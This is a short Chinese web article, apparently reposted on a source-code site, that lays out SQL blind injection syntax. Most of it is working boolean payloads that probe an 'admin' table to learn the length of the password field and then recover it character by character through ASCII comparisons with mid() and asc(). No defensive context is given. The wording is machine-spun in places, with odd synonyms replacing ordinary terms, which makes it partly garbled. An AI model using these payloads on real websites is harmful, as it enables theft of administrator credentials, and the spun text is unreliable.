对于sql盲注语法
发布时间:09/01 来源:未知 浏览:
关键词:
猎取数据长度:
and (select top 1 len(列名) from 表名)>5 and (select top 1 len(password) from admin)>16//错误 and (select top 1 len(password) from admin)>15//正常
猎取指定位数的数据:
and (select top 1 asc(mid(列名,位置,1)) from 表名)>97 and (select top 1 asc(mid(admin,1,1)) from admin)>96//推断admin字段的内容第一位的ascii码值大于96 正常 and (select top 1 asc(mid(admin,1,1)) from admin)>97//推断admin字段的内容第一位的ascii码值大于97 错误 说明就是97
mid(字符串,截取的位置,截取字符数) asc() //将字符转换成ascii码 利便停止比力
引荐:《mysql视频教程》
以上就是关于sql盲注语法的具体内容,更多请关注百分百源码网其它相关文章!
